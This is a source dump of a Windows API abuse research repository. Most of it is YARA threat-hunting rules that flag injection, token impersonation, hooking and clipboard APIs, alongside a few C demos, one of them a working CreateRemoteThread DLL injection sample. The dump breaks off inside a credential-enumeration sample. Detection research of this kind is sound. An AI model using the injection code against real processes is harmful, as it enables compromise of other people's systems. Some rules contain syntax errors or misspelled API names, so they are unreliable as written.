"AmsiScanString" ascii wide 26 | 27 | condition: 28 | (uint16(0) == 0x5A4D and // PE file 29 | filesize < 10MB) and 30 | // Look for patches in memory dumps or binaries where AmsiScanString is referenced 31 | (any of ($patch*) and $amsiStr) 32 | } 33 | -------------------------------------------------------------------------------- /SHELL32/SHGetKnownFolderPath/SHGetKnownFolderPath.yar: -------------------------------------------------------------------------------- 1 | // Note: Use these YARA rules at your own risk. They are loosely scoped and intended primarily 2 | // for threat hunting and research purposes — not for deployment in detection systems that 3 | // require a low false positive rate. Please review and test in your environment before use. 4 | 5 | rule Suspicious_SHGetKnownFolderIDList_Usage 6 | { 7 | meta: 8 | description = "Detects binaries importing or referencing SHGetKnownFolderIDList" 9 | author = "Windows API Abuse Atlas" 10 | 11 | strings: 12 | $SHGetKnownFolderIDList = "SHGetKnownFolderIDList" ascii wide 13 | 14 | // Commonly abused Known Folder GUIDs (ASCII & Wide) 15 | // Startup: {B97D20BB-F46A-4C97-BA10-5E3608430854} 16 | $guid_startup_ascii = "{B97D20BB-F46A-4C97-BA10-5E3608430854}" ascii wide 17 | 18 | // Roaming AppData: {3EB685DB-65F9-4CF6-A03A-E3EF65729F3D} 19 | $guid_appdata_ascii = "{3EB685DB-65F9-4CF6-A03A-E3EF65729F3D}" ascii wide 20 | 21 | // LocalAppData: {F1B32785-6FBA-4FCF-9D55-7B8E7F157091} 22 | $guid_localappdata_ascii = "{F1B32785-6FBA-4FCF-9D55-7B8E7F157091}" ascii wide 23 | 24 | // Temp: {FDD39AD0-238F-46AF-ADB4-6C85480369C7} 25 | $guid_temp_ascii = "{FDD39AD0-238F-46AF-ADB4-6C85480369C7}" ascii 26 | 27 | 28 | condition: 29 | uint16(0) == 0x5A4D and // PE file 30 | filesize < 10MB and 31 | $SHGetKnownFolderIDList and 32 | (1 of ($guid*)) 33 | } -------------------------------------------------------------------------------- /OLE32/CoCreateInstance/sample.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include // For IWebBrowser2 4 | #include 5 | 6 | int main(void) { 7 | HRESULT hr; 8 | IWebBrowser2 *pWebBrowser = NULL; 9 | VARIANT empty = {0}; 10 | 11 | // Initialize COM library 12 | hr = CoInitialize(NULL); 13 | if (FAILED(hr)) { 14 | printf("Failed to initialize COM: 0x%lx\n", hr); 15 | return 1; 16 | } 17 | 18 | // Create an instance of InternetExplorer.Application 19 | hr = CoCreateInstance(&CLSID_InternetExplorer, NULL, CLSCTX_LOCAL_SERVER, 20 | &IID_IWebBrowser2, (void **)&pWebBrowser); 21 | if (FAILED(hr)) { 22 | printf("CoCreateInstance failed: 0x%lx\n", hr); 23 | CoUninitialize(); 24 | return 1; 25 | } 26 | 27 | // Make browser visible 28 | pWebBrowser->lpVtbl->put_Visible(pWebBrowser, VARIANT_TRUE); 29 | 30 | // Navigate to the desired URL 31 | BSTR url = SysAllocString(L"https://github.com/danafaye/WindowsAPIAbuseAtlas"); 32 | hr = pWebBrowser->lpVtbl->Navigate(pWebBrowser, url, &empty, &empty, &empty, &empty); 33 | 34 | if (FAILED(hr)) { 35 | printf("Navigate failed: 0x%lx\n", hr); 36 | } 37 | 38 | // Wait for user input before exiting 39 | printf("Press Enter to exit...\n"); 40 | getchar(); 41 | 42 | // Clean up 43 | SysFreeString(url); 44 | pWebBrowser->lpVtbl->Release(pWebBrowser); 45 | CoUninitialize(); 46 | 47 | return 0; 48 | } -------------------------------------------------------------------------------- /USER32/SetWindowsHookEx/SetWindowsHookEx.yar: -------------------------------------------------------------------------------- 1 | // Note: Use these YARA rules at your own risk. They are loosely scoped and intended primarily 2 | // for threat hunting and research purposes — not for deployment in detection systems that 3 | // require a low false positive rate. Please review and test in your environment before use. 4 | 5 | rule Suspicious_SetWindowsHookEx_Usage 6 | { 7 | meta: 8 | description = "Detects binaries that import or reference SetWindowsHookEx which may indicate keylogging, injection, or UI tampering behavior" 9 | reference = "Windows API Abuse Atlas" 10 | 11 | strings: 12 | $func = "SetWindowsHookEx" ascii wide 13 | $dll = "user32.dll" ascii 14 | 15 | // Common hook constants as dword (little-endian) 16 | $wh_keyboard_ll = { 0D 00 00 00 } // 13 17 | $wh_mouse_ll = { 0E 00 00 00 } // 14 18 | $wh_cbt = { 05 00 00 00 } // 5 19 | $wh_callwndproc = { 04 00 00 00 } // 4 20 | condition: 21 | (uint16(0) == 0x5A4D) and // MZ header check 22 | filesize < 10MB and // Reasonable file size limit 23 | $dll and 24 | ( 25 | $func and 26 | ( 27 | $wh_keyboard_ll in ( @func - 100 .. @func + 100 ) or 28 | $wh_mouse_ll in ( @func - 100 .. @func + 100 ) or 29 | $wh_cbt in ( @func - 100 .. @func + 100 ) or 30 | $wh_callwndproc in ( @func - 100 .. @func + 100 ) 31 | ) 32 | ) 33 | } -------------------------------------------------------------------------------- /KERNEL32/PssCaptureSnapshot/PssCaptureSnapshot.yar: -------------------------------------------------------------------------------- 1 | // Note: Use these YARA rules at your own risk. They are loosely scoped and intended primarily 2 | // for threat hunting and research purposes — not for deployment in detection systems that 3 | // require a low false positive rate. Please review and test in your environment before use. 4 | import "pe" 5 | 6 | rule Suspicious_PssCaptureSnapshot_Usage 7 | { 8 | meta: 9 | description = "Detects binaries abusing PssCaptureSnapshot in combination with typical combination that indicates malicious activity." 10 | reference = "Windows API Abuse Atlas" 11 | 12 | strings: 13 | $PssCaptureSnapshot = "PssCaptureSnapshot" ascii wide 14 | $NtPssCaptureSnapshot = "NtPssCaptureSnapshot" ascii wide 15 | $api_1 = "PssQuerySnapshot" ascii wide 16 | $api_2 = "PssWalkMarker" ascii wide 17 | $api_3 = "PssFreeSnapshot" ascii wide 18 | $api_4 = "NtReadVirtualMemory" ascii wide 19 | $api_5 = "OpenProcess" ascii wide 20 | $api_6 = "GetProcAddress" ascii wide 21 | 22 | condition: 23 | uint16(0) == 0x5A4D and // PE header 24 | filesize < 5MB and 25 | // Not signed by Microsoft 26 | not for any i in (0..pe.number_of_signatures): 27 | (pe.signatures[i].issuer contains "Microsoft") and 28 | ($PssCaptureSnapshot or $NtPssCaptureSnapshot) and 29 | ( 30 | // Check for common post-snapshot APIs that indicate malicious use 31 | 2 of ($api_*) 32 | ) 33 | 34 | } 35 | -------------------------------------------------------------------------------- /NETAPI32/NetLocalGroupGetMembers/NetLocalGroupGetMembers.yar: -------------------------------------------------------------------------------- 1 | // Note: Use these YARA rules at your own risk. They are loosely scoped and intended primarily 2 | // for threat hunting and research purposes — not for deployment in detection systems that 3 | // require a low false positive rate. Please review and test in your environment before use. 4 | 5 | rule Suspicious_NetLocalGroupGetMembers_Usage { 6 | meta: 7 | description = "Detects potential abuse of NetLocalGroupGetMembers API for privilege discovery" 8 | author = "Windows API Abuse Atlas" 9 | 10 | strings: 11 | // API Names 12 | $api1 = "NetLocalGroupGetMembers" ascii wide 13 | $api2 = "NetLocalGroupEnum" ascii wide 14 | $api3 = "NetUserGetLocalGroups" ascii wide 15 | 16 | // Common Group Names 17 | $group1 = "Administrators" ascii wide nocase 18 | $group2 = "Domain Admins" ascii wide nocase 19 | $group3 = "Enterprise Admins" ascii wide nocase 20 | $group4 = "Remote Desktop Users" ascii wide nocase 21 | 22 | // Common Enumeration Patterns 23 | $enum1 = "wksta" ascii wide nocase 24 | $enum2 = "domain" ascii wide nocase 25 | $enum3 = "computer" ascii wide nocase 26 | 27 | condition: 28 | uint16(0) == 0x5A4D and // PE file 29 | filesize < 10MB and // Size constraint 30 | ( 31 | // Additional context 32 | (1 of ($api*)) and 33 | (1 of ($group*)) and 34 | (1 of ($enum*)) 35 | ) 36 | } -------------------------------------------------------------------------------- /NTDLL/NtAlpcConnectPort/NtAlpcConnectPort.yar: -------------------------------------------------------------------------------- 1 | // Note: Use these YARA rules at your own risk. They are loosely scoped and intended primarily 2 | // for threat hunting and research purposes — not for deployment in detection systems that 3 | // require a low false positive rate. Please review and test in your environment before use. 4 | 5 | rule Suspicious_NtAlpcConnectPort 6 | { 7 | meta: 8 | description = "Detects potential abuse of NtAlpcConnectPort via import or string references" 9 | reference = "Windows API Abuse Atlas: NtAlpcConnectPort" 10 | 11 | strings: 12 | $NtAlpcConnectPort = "NtAlpcConnectPort" ascii wide 13 | 14 | $token_1 = "AdjustTokenPrivileges" ascii wide 15 | $token_2 = "DuplicateTokenEx" ascii wide 16 | $token_3 = "ImpersonateLoggedOnUser" ascii wide 17 | $token_4 = "OpenProcessToken" ascii wide 18 | $token_5 = "OpenThreadToken" ascii wide 19 | 20 | $inject_1 = "NtCreateTheadEx" ascii wide 21 | $inject_2 = "CreateRemoteThread" ascii wide 22 | $inject_3 = "RtlCreateUserThread" ascii wide 23 | $inject_4 = "WriteProcessMemory" ascii wide 24 | $inject_5 = "VirtualAllocEx" ascii wide 25 | $inject_6 = "QueueUserAPC" ascii wide 26 | $inject_7 = "SetThreadContext" ascii wide 27 | 28 | condition: 29 | uint16(0) == 0x5A4D and 30 | filesize < 10MB and 31 | $NtAlpcConnectPort and 32 | ( 33 | (1 of ($token_*) ) or 34 | (1 of ($inject_*) ) 35 | ) 36 | 37 | } 38 | -------------------------------------------------------------------------------- /KERNEL32/PssCaptureSnapshot/sample.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include // For PROCESS_QUERY_INFORMATION 5 | #include // Process Snapshot API headers 6 | #include // For PssCaptureSnapshot and friends 7 | 8 | 9 | #pragma comment(lib, "Pssapi.lib") 10 | 11 | int main() { 12 | HANDLE snapshot = NULL; 13 | DWORD pid = GetCurrentProcessId(); 14 | HANDLE hProcess = OpenProcess(PROCESS_QUERY_INFORMATION | PROCESS_VM_READ, FALSE, pid); 15 | if (!hProcess) { 16 | printf("Failed to open process: %lu\n", GetLastError()); 17 | return 1; 18 | } 19 | 20 | // Capture a snapshot of the current process 21 | HRESULT hPssCaptureSnapshot = PssCaptureSnapshot( 22 | hProcess, 23 | PSS_CAPTURE_VA_CLONE | PSS_CAPTURE_HANDLES | PSS_CAPTURE_THREADS, 24 | CONTEXT_ALL, 25 | &snapshot 26 | ); 27 | 28 | if (FAILED(hPssCaptureSnapshot)) { 29 | printf("PssCaptureSnapshot failed: 0x%lx\n", hPssCaptureSnapshot); 30 | CloseHandle(hProcess); 31 | return 1; 32 | } 33 | 34 | printf("Snapshot captured successfully.\n"); 35 | 36 | // Normally you would query and walk the snapshot here 37 | // For this example, just free it immediately 38 | hPssCaptureSnapshot = PssFreeSnapshot(GetCurrentProcess(), snapshot); 39 | if (FAILED(hPssCaptureSnapshot)) { 40 | printf("PssFreeSnapshot failed: 0x%lx\n", hPssCaptureSnapshot); 41 | } else { 42 | printf("Snapshot freed successfully.\n"); 43 | } 44 | 45 | CloseHandle(hProcess); 46 | return 0; 47 | } 48 | -------------------------------------------------------------------------------- /UIAUTOMATIONCORE/AddAutomationEventHandler/AddAutomationEventHandler.yar: -------------------------------------------------------------------------------- 1 | // Note: Use these YARA rules at your own risk. They are loosely scoped and intended primarily 2 | // for threat hunting and research purposes — not for deployment in detection systems that 3 | // require a low false positive rate. Please review and test in your environment before use. 4 | 5 | rule detect_UIA_AddAutomationEventHandler_Abuse { 6 | meta: 7 | author = "Windows API Abuse Atlas" 8 | description = "Detects potential malicious use of AddAutomationEventHandler for UI surveillance." 9 | 10 | 11 | strings: 12 | // IUIAutomation interface GUID - represented as raw bytes as COM expects it 13 | // {ff48dba4-60ef-4201-aa87-54103eef594e} 14 | // Data1 (A4 DB 48 FF) - little-endian 15 | // Data2 (EF 60) - little-endian 16 | // Data3 (01 42) - little-endian 17 | // Data4 (AA 87 54 10 3E EF 59 4E) - big-endian 18 | $IUIAutomation_guid_bytes = { A4 DB 48 FF EF 60 01 42 AA 87 54 10 3E EF 59 4E } 19 | $IUIAutomation_guid = "{ff48dba4-60ef-4201-aa87-54103eef594e}" ascii wide 20 | 21 | // Common COM initialization/object creation APIs 22 | $s_CoInitialize = "CoInitialize" ascii wide 23 | $s_CoCreateInstance = "CoCreateInstance" ascii wide 24 | 25 | // APIs for discovering UI elements 26 | $s_GetRootElement = "GetRootElement" ascii wide 27 | $s_ElementFromHandle = "ElementFromHandle" ascii wide 28 | $s_FindFirst = "FindFirst" ascii wide 29 | $s_FindAll = "FindAll" ascii wide 30 | 31 | condition: 32 | uint16(0) == 0x5A4D and // MZ header for Windows executable 33 | 34 | (1 of ($IUI*)) and 35 | (any of ($s_*)) 36 | } 37 | -------------------------------------------------------------------------------- /USER32/SetClipboardData/SetClipboardData.yar: -------------------------------------------------------------------------------- 1 | // Note: Use these YARA rules at your own risk. They are loosely scoped and intended primarily 2 | // for threat hunting and research purposes — not for deployment in detection systems that 3 | // require a low false positive rate. Please review and test in your environment before use. 4 | 5 | rule Suspicious_SetClipboardData_Usage 6 | { 7 | meta: 8 | description = "Flags binaries that import or reference SetClipboardData and related clipboard APIs, possibly for abuse." 9 | reference = "Windows API Abuse Atlas - SetClipboardData" 10 | 11 | strings: 12 | $SetClipboardData = "SetClipboardData" ascii wide 13 | $a1 = "OpenClipboard" ascii wide 14 | $a2 = "GetClipboardData" ascii wide 15 | $a3 = "EmptyClipboard" ascii wide 16 | $a4 = "AddClipboardFormatListener" ascii wide 17 | $a5 = "SetClipboardViewer" ascii wide 18 | $a6 = "ChangeClipboardChain" ascii wide 19 | $a7 = "GetClipboardSequenceNumber" ascii wide 20 | $a8 = "IsClipboardFormatAvailable" ascii wide 21 | $a9 = "RegisterClipboardFormat" ascii wide 22 | $a10 = "UnregisterClipboardFormat" ascii wide 23 | $a11 = "GetClipboardData" ascii wide 24 | 25 | // Optional suspicious context 26 | $s1 = /[13][a-km-zA-HJ-NP-Z1-9]{25,34}/ ascii wide // generic BTC address pattern 27 | $s2 = "powershell" ascii wide 28 | $s3 = "cmd.exe" ascii wide 29 | 30 | condition: 31 | uint16(0) == 0x5A4D and // Check for MZ header 32 | filesize < 10MB and 33 | $SetClipboardData and 34 | (1 of ($a*)) and 35 | (1 of ($s*)) 36 | } 37 | -------------------------------------------------------------------------------- /KERNEL32/CreateRemoteThread/CreateRemoteThread.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | 4 | // Disclaimer: Use this code only in lab environments you control. It is meant for learning how malware techniques work — not for real-world use. 5 | 6 | int main() { 7 | // Target process ID (replace with the actual PID of notepad.exe or something safe) 8 | DWORD pid = 1234; 9 | 10 | // DLL path to inject (make sure this path exists and the DLL is benign) 11 | const char* dllPath = "C:\\Path\\To\\Your\\DLL.dll"; 12 | 13 | // Open the target process with required permissions 14 | HANDLE hProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, pid); 15 | 16 | // Allocate memory in the target process 17 | LPVOID allocMem = VirtualAllocEx(hProcess, NULL, strlen(dllPath) + 1, 18 | MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE); 19 | 20 | // Write the DLL path to the allocated memory 21 | WriteProcessMemory(hProcess, allocMem, dllPath, strlen(dllPath) + 1, NULL); 22 | 23 | // Get the address of LoadLibraryA 24 | LPVOID loadLibAddr = (LPVOID)GetProcAddress(GetModuleHandle("kernel32.dll"), "LoadLibraryA"); 25 | 26 | // Create a remote thread that calls LoadLibraryA with our DLL path 27 | HANDLE hThread = CreateRemoteThread(hProcess, NULL, 0, 28 | (LPTHREAD_START_ROUTINE)loadLibAddr, 29 | allocMem, 0, NULL); 30 | 31 | // Wait for the thread to finish 32 | WaitForSingleObject(hThread, INFINITE); 33 | 34 | // Clean up 35 | CloseHandle(hThread); 36 | CloseHandle(hProcess); 37 | 38 | printf("DLL injected!\n"); 39 | return 0; 40 | } 41 | -------------------------------------------------------------------------------- /NTDLL/NtCreateSection/NtCreateSection.yar: -------------------------------------------------------------------------------- 1 | // Note: Use these YARA rules at your own risk. They are loosely scoped and intended primarily 2 | // for threat hunting and research purposes — not for deployment in detection systems that 3 | // require a low false positive rate. Please review and test in your environment before use. 4 | 5 | import "pe" 6 | 7 | rule NtCreateSection_NtMapViewOfSection_Proximity 8 | { 9 | meta: 10 | description = "Detects NtCreateSection and NtMapViewOfSection strings in close proximity, plus any common thread or injection API, in Windows PE files" 11 | reference = "windows-api-abuse-atlas" 12 | strings: 13 | $ntcreate = "NtCreateSection" ascii nocase 14 | $ntmap = "NtMapViewOfSection" ascii nocase 15 | $createremote = "CreateRemoteThread" ascii nocase 16 | $ntcreatethread = "NtCreateThreadEx" ascii nocase 17 | $createthread = "CreateThread" ascii nocase 18 | $rtlcreateuser = "RtlCreateUserThread" ascii nocase 19 | $queueapc = "QueueUserAPC" ascii nocase 20 | $setthreadctx = "SetThreadContext" ascii nocase 21 | $writeproc = "WriteProcessMemory" ascii nocase 22 | $virtualallocex = "VirtualAllocEx" ascii nocase 23 | condition: 24 | uint16(0) == 0x5A4D and 25 | filesize < 10MB and 26 | ( 27 | $createremote or $ntcreatethread or $createthread or $rtlcreateuser or $queueapc or $setthreadctx or $writeproc or $virtualallocex 28 | ) and 29 | for any i in (1..#ntcreate) : ( 30 | for any j in (1..#ntmap) : ( 31 | ((@ntcreate[i] - @ntmap[j]) >= -64 and (@ntcreate[i] - @ntmap[j]) <= 64) 32 | ) 33 | ) 34 | } 35 | 36 | -------------------------------------------------------------------------------- /NTDLL/NtQueueApcThread/NtQueueApcThread.yar: -------------------------------------------------------------------------------- 1 | // Note: Use these YARA rules at your own risk. They are loosely scoped and intended primarily 2 | // for threat hunting and research purposes — not for deployment in detection systems that 3 | // require a low false positive rate. Please review and test in your environment before use. 4 | 5 | import "pe" 6 | 7 | rule NtQueueApcThread 8 | { 9 | meta: 10 | description = "Detects APC injection: NtQueueApcThread + ResumeThread + memory allocation/writing" 11 | reference = "windows-api-abuse-atlas" 12 | strings: 13 | $ntqueueapc = "NtQueueApcThread" ascii nocase 14 | $resumethread = "ResumeThread" ascii nocase 15 | $virtualalloc = "VirtualAllocEx" ascii nocase 16 | $writeproc = "WriteProcessMemory" ascii nocase 17 | condition: 18 | uint16(0) == 0x5A4D and 19 | filesize < 10MB and 20 | $ntqueueapc and 21 | $resumethread and 22 | ($virtualalloc or $writeproc) 23 | } 24 | 25 | rule NtQueueApcThread_AtomBombing 26 | { 27 | meta: 28 | description = "Detects AtomBombing: NtQueueApcThread + atom table APIs + (optional) memory writing" 29 | reference = "windows-api-abuse-atlas" 30 | strings: 31 | $ntqueueapc = "NtQueueApcThread" ascii nocase 32 | $globaladdatom = "GlobalAddAtom" ascii nocase 33 | $globalgetatom = "GlobalGetAtomName" ascii nocase 34 | $globalfindatom = "GlobalFindAtom" ascii nocase 35 | $writeproc = "WriteProcessMemory" ascii nocase 36 | condition: 37 | uint16(0) == 0x5A4D and 38 | filesize < 10MB and 39 | $ntqueueapc and 40 | ($globaladdatom or $globalgetatom or $globalfindatom) and 41 | ($writeproc) 42 | } -------------------------------------------------------------------------------- /KERNEL32/UpdateProcThreadAttribute/UpdateProcThreadAttribute.yar: -------------------------------------------------------------------------------- 1 | // Note: Use these YARA rules at your own risk. They are loosely scoped and intended primarily 2 | // for threat hunting and research purposes — not for deployment in detection systems that 3 | // require a low false positive rate. Please review and test in your environment before use. 4 | 5 | import "pe" 6 | 7 | rule UpdateProcThreadAttribute_ParentSpoofing 8 | { 9 | meta: 10 | description = "Detects UpdateProcThreadAttribute used with parent process spoofing or process creation APIs" 11 | reference = "windows-api-abuse-atlas" 12 | strings: 13 | $update = "UpdateProcThreadAttribute" ascii nocase 14 | $parent = "PROC_THREAD_ATTRIBUTE_PARENT_PROCESS" ascii nocase 15 | $create = "CreateProcess" ascii nocase 16 | $createinternal = "CreateProcessInternalW" ascii nocase 17 | condition: 18 | uint16(0) == 0x5A4D and 19 | filesize < 10MB and 20 | $update and 21 | ($parent or $create or $createinternal) 22 | } 23 | 24 | rule UpdateProcThreadAttribute_InjectionChain 25 | { 26 | meta: 27 | description = "Detects UpdateProcThreadAttribute used with process injection APIs" 28 | reference = "windows-api-abuse-atlas" 29 | strings: 30 | $update = "UpdateProcThreadAttribute" ascii nocase 31 | $virtualalloc = "VirtualAllocEx" ascii nocase 32 | $write = "WriteProcessMemory" ascii nocase 33 | $createremote = "CreateRemoteThread" ascii nocase 34 | $queueapc = "NtQueueApcThread" ascii nocase 35 | condition: 36 | uint16(0) == 0x5A4D and 37 | filesize < 10MB and 38 | $update and 39 | $virtualalloc and 40 | ($write or $createremote or $queueapc) 41 | } -------------------------------------------------------------------------------- /OLE32/CoCreateInstanceEx/CoCreateInstanceEx.yar: -------------------------------------------------------------------------------- 1 | // Note: Use these YARA rules at your own risk. They are loosely scoped and intended primarily 2 | // for threat hunting and research purposes — not for deployment in detection systems that 3 | // require a low false positive rate. Please review and test in your environment before use. 4 | 5 | rule CommonlyAbused_COM_CLSIDs_Binary 6 | { 7 | meta: 8 | description = "Detects binary representations of commonly abused COM CLSIDs" 9 | reference = "Windows API Abuse Atlas" 10 | 11 | strings: 12 | $CoCreateInstanceEx = "CoCreateInstanceEx" ascii wide 13 | 14 | $clsid_ShellWindows = { 72 59 A0 9B A8 F6 CF 11 A4 42 00 A0 C9 0A 8F 39 } 15 | $clsid_ShellApplication = { 20 96 70 13 79 C2 CE 11 A4 9E 44 45 53 54 00 00 } 16 | $clsid_WScriptShell1 = { D5 4D C2 72 0A D7 8B 43 8A 42 98 42 4B 88 AF B8 } 17 | $clsid_WScriptShell2 = { C5 10 3B D6 46 BB 90 49 A9 4F E4 0B 9D 52 01 60 } 18 | $clsid_FileSystemObject = { 32 8F 07 F5 51 C5 D3 11 89 B9 00 00 F8 1F E2 21 } 19 | $clsid_Msxml2DOMDocument6 = { C0 69 D9 88 92 F1 D4 11 A6 5F 00 40 96 32 51 E5 } 20 | $clsid_IEWebBrowser = { 68 5B 17 9E 2A F5 D8 11 B9 A5 50 50 54 50 30 30 } 21 | $clsid_InternetExplorerApp = { 01 DF 02 00 00 00 00 00 C0 00 00 00 00 00 00 46 } 22 | $clsid_IE_alt = { 01 0C B0 DC 0F 57 9B 4A 8D 69 19 9F DB A5 72 3B } 23 | $clsid_MS_XMLHTTP = { 63 E3 EA 45 2A 12 5A 44 97 B6 3D E8 90 E7 86 F8 } 24 | $clsid_MS_Outlook = { 3A F0 06 00 00 00 00 00 C0 00 00 00 00 00 00 46 } 25 | condition: 26 | uint16(0) == 0x5A4D and // PE file 27 | filesize < 10MB and 28 | $CoCreateInstanceEx and 29 | any of ($clsid*) 30 | } 31 | -------------------------------------------------------------------------------- /OLE32/CoGetClassObject/CoGetClassObject.yar: -------------------------------------------------------------------------------- 1 | // Note: Use these YARA rules at your own risk. They are loosely scoped and intended primarily 2 | // for threat hunting and research purposes — not for deployment in detection systems that 3 | // require a low false positive rate. Please review and test in your environment before use. 4 | 5 | rule CommonlyAbused_COM_CLSIDs_Binary 6 | { 7 | meta: 8 | description = "Detects binary representations of commonly abused COM CLSIDs" 9 | reference = "Windows API Abuse Atlas" 10 | 11 | strings: 12 | $CoGetClassObject = "CoGetClassObject" ascii wide 13 | 14 | $clsid_ShellWindows = { 72 59 A0 9B A8 F6 CF 11 A4 42 00 A0 C9 0A 8F 39 } 15 | $clsid_ShellApplication = { 20 96 70 13 79 C2 CE 11 A4 9E 44 45 53 54 00 00 } 16 | $clsid_WScriptShell1 = { D5 4D C2 72 0A D7 8B 43 8A 42 98 42 4B 88 AF B8 } 17 | $clsid_WScriptShell2 = { C5 10 3B D6 46 BB 90 49 A9 4F E4 0B 9D 52 01 60 } 18 | $clsid_FileSystemObject = { 32 8F 07 F5 51 C5 D3 11 89 B9 00 00 F8 1F E2 21 } 19 | $clsid_Msxml2DOMDocument6 = { C0 69 D9 88 92 F1 D4 11 A6 5F 00 40 96 32 51 E5 } 20 | $clsid_IEWebBrowser = { 68 5B 17 9E 2A F5 D8 11 B9 A5 50 50 54 50 30 30 } 21 | $clsid_InternetExplorerApp = { 01 DF 02 00 00 00 00 00 C0 00 00 00 00 00 00 46 } 22 | $clsid_IE_alt = { 01 0C B0 DC 0F 57 9B 4A 8D 69 19 9F DB A5 72 3B } 23 | $clsid_MS_XMLHTTP = { 63 E3 EA 45 2A 12 5A 44 97 B6 3D E8 90 E7 86 F8 } 24 | $clsid_MS_Outlook = { 3A F0 06 00 00 00 00 00 C0 00 00 00 00 00 00 46 } 25 | 26 | condition: 27 | uint16(0) == 0x5A4D and // PE file 28 | filesize < 10MB and 29 | $CoGetClassObject and 30 | any of ($clsid*) 31 | } 32 | -------------------------------------------------------------------------------- /KERNEL32/SetSearchPathMode/sample.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | 4 | #ifndef BASE_SEARCH_PATH_PER_USER_ENABLE 5 | #define BASE_SEARCH_PATH_PER_USER_ENABLE 0x00000004 6 | #endif 7 | 8 | // To use this you'll need to create a test DLL named "testdll.dll" 9 | // and place it in the current working directory. 10 | // The DLL should export a function to verify it loaded correctly. 11 | 12 | int main() { 13 | 14 | // 1. Call without enabling per-user paths 15 | printf("[*] Trying to load testdll.dll without per-user paths...\n"); 16 | HMODULE h1 = LoadLibraryA("testdll.dll"); 17 | if (h1 == NULL) { 18 | printf("[-] Failed to load DLL (expected if not in app/System32).\n"); 19 | } else { 20 | printf("[+] Loaded DLL from: testdll.dll\n"); 21 | FreeLibrary(h1); 22 | } 23 | 24 | // 2. Enable per-user search paths 25 | if (!SetSearchPathMode(BASE_SEARCH_PATH_PER_USER_ENABLE)) { 26 | printf("[-] Failed to enable per-user search mode. Error: %lu\n", GetLastError()); 27 | return 1; 28 | } 29 | printf("[*] Enabled BASE_SEARCH_PATH_PER_USER_ENABLE.\n"); 30 | 31 | // 3. Try loading again (now per-user DLL dirs are included) 32 | printf("[*] Trying to load testdll.dll with per-user paths enabled...\n"); 33 | HMODULE h2 = LoadLibraryA("testdll.dll"); 34 | if (h2 == NULL) { 35 | printf("[-] Still failed to load DLL. Did you add it to a per-user directory?\n"); 36 | } else { 37 | printf("[+] Loaded DLL from per-user directory!\n"); 38 | FreeLibrary(h2); 39 | } 40 | 41 | return 0; 42 | } 43 | 44 | // WinMain wrapper to satisfy the linker 45 | #ifdef _WIN32 46 | int WINAPI WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nCmdShow) { 47 | return main(); 48 | } 49 | #endif -------------------------------------------------------------------------------- /ADVAPI32/ImpersonateLoggedOnUser/ImpersonateLoggedOnUser.yar: -------------------------------------------------------------------------------- 1 | // Note: Use these YARA rules at your own risk. They are loosely scoped and intended primarily 2 | // for threat hunting and research purposes — not for deployment in detection systems that 3 | // require a low false positive rate. Please review and test in your environment before use. 4 | 5 | rule WIN_API_ImpersonateLoggedOnUser_Abuse_AllInOne 6 | { 7 | meta: 8 | author = "Windows API Abuse Atlas" 9 | description = "Hunt for binaries/scripts that import or dynamically resolve ImpersonateLoggedOnUser along with typical token abuse & lateral movement helpers." 10 | 11 | strings: 12 | // Direct function name (static or in dyn-res) 13 | $ImpersonateLoggedOnUser = "ImpersonateLoggedOnUser" ascii wide 14 | 15 | // Token acquisition & manipulation (common neighbors) 16 | $tok_openproc_a = "OpenProcessToken" ascii 17 | $tok_openthread = "OpenThreadToken" ascii 18 | $tok_dup_a = "DuplicateToken" ascii 19 | $tok_adjpriv = "AdjustTokenPrivileges" ascii 20 | $tok_setthread = "SetThreadToken" ascii 21 | $tok_revert = "RevertToSelf" ascii 22 | $tok_logon = "LogonUser" ascii 23 | $tok_ntsetinfo = "NtSetInformationToken" ascii 24 | 25 | // Post-impersonation execution & movement helpers 26 | $post_cpasuser = "CreateProcessAsUser" ascii 27 | $post_cpwtoken = "CreateProcessWithToken" ascii 28 | $post_net_use = "NetUseAdd" ascii 29 | $post_rpc_auth = "RpcBindingSetAuthInfo" ascii 30 | $post_wmi_spawn = "Win32_Process" ascii 31 | $post_psexec_like = "SERVICE_CONTROL_START" ascii 32 | 33 | condition: 34 | uint16(0) == 0x5A4D and 35 | filesize < 5MB and 36 | $ImpersonateLoggedOnUser and 37 | ((2 of ($tok*)) and (1 of ($post*))) 38 | } 39 | -------------------------------------------------------------------------------- /NTDLL/ZwQuerySystemInformationEx/ZwQuerySystemInformation.yar: -------------------------------------------------------------------------------- 1 | // Note: Use these YARA rules at your own risk. They are loosely scoped and intended primarily 2 | // for threat hunting and research purposes — not for deployment in detection systems that 3 | // require a low false positive rate. Please review and test in your environment before use. 4 | 5 | 6 | rule Detect_ZwQuerySystemInformationEx_Usage 7 | { 8 | meta: 9 | author = "Windows API Abuse Atlas" 10 | description = "Detect attempts to resolve or use ZwQuerySystemInformationEx in ntdll.dll" 11 | 12 | strings: 13 | // The function name as an ASCII string (common to see in export table parsing or GetProcAddress) 14 | $func_name = "ZwQuerySystemInformation" ascii wide 15 | 16 | // Common suspicious string obfuscation patterns (hex encoded fragments or scrambled strings often seen) 17 | $obf_1 = { 5A 77 51 75 65 72 79 53 79 73 74 65 6D 49 6E 66 6F } // "ZwQuerySystemInfo" fragment in ASCII hex 18 | $obf_2 = { 51 75 65 72 79 53 79 73 74 65 6D } // "QuerySystem" substring 19 | 20 | // Suspicious PE export table parsing strings 21 | $export_parse_1 = "GetProcAddress" ascii 22 | $export_parse_2 = "LoadLibrary" ascii 23 | $export_parse_3 = "ntdll.dll" ascii wide 24 | 25 | condition: 26 | // Presence of the function name string in ASCII or wide char format 27 | $func_name 28 | 29 | // Presence of obfuscated string fragments related to function name plus signs of export table parsing 30 | (any of ($obf_*) and any of ($export_parse_*)) or 31 | 32 | // If the binary is trying to manually resolve exports by combining LoadLibrary/GetProcAddress and suspicious string fragments 33 | (all of ($export_parse_*) and any of ($obf_*)) 34 | } -------------------------------------------------------------------------------- /ADVAPI32/CredEnumerateW/sample.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include 5 | #include 6 | #include 7 | 8 | int main() { 9 